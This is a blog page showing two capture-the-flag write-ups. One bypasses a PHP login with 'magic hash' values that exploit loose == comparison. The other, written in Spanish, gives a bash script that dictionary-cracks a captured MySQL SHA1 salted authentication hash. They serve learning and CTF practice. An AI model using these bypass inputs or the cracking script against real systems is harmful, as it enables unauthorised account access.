Showing posts with label sha1. Show all posts
Showing posts with label sha1. Show all posts

# GynvaelEN mission 018 


# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/admin.php?password1=240610708&password2=10932435112'
Welcome back dear admin.
Your flag: I'm not sure this is how equality is supposed to work.

Now try with <a href='superadmin.php'>superadmin.php</a>!
# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/superadmin.php'
...
if (hash("sha256", $_GET['password']) ==
'0e12345678901234567890123456789012345678901234567890123456789012')
...
_:)

Source

https://www.youtube.com/watch?v=adHOlKKbFXM (2:00:22)

References

https://www.whitehatsec.com/blog/magic-hashes/
Posted by t0n1 0 comments
Labels: , , , , , , , , ,

# Reto contraseñas mysql (sha1, salt)

Introducción

En el reto 'networking 2' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos mysql.
Utilizaremos un salt y una contraseña distintos.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Contraseña: d648fcba578670abf1ec93b0dce1b41f681dc71c

Ejecución 
# cat diccionario.txt
hack
tracking
wargame
# cat mysql_sha1_salt.sh
#!/bin/bash

function dec2hex {
 printf %x $1
}
function hex2ascii {
 printf %s $1 | xxd -r -p
}
function hex2dec {
 printf %d $1
}
function sha1 {
 printf %s $1 | sha1sum | cut -d ' ' -f1
}
function xor {
 length=$[$1-1]
 string_a=$2
 string_b=$3
 for i in `seq 0 $length`
 do
  a=`hex2dec 0x${string_a:$i:1}`
  b=`hex2dec 0x${string_b:$i:1}`
  xored=$xored`dec2hex $(printf '%d' $[$a^$b])`
 done
 printf %s $xored
}

salt=$1
password_file=$2
captured_password=$3

while read secret
do
 hash_stage_1=`sha1 $secret`
 hash_stage_1_=`hex2ascii $hash_stage_1`
 #echo $hash_stage_1
 hash_stage_2=`sha1 $hash_stage_1_`
 hash_stage_2_=`hex2ascii $hash_stage_2`
 #echo $hash_stage_2
 hash_stage_3=`sha1 $salt$hash_stage_2_`
 #echo $hash_stage_3
 generated_password=`xor 40 $hash_stage_1 $hash_stage_3`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./mysql_sha1_salt.sh x8MXV%QLgDZ{ypGN6^Y# \
diccionario.txt \
d648fcba578670abf1ec93b0dce1b41f681dc71c
tracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c
Posted by t0n1 0 comments
Labels: , ,
Subscribe to: Posts (Atom)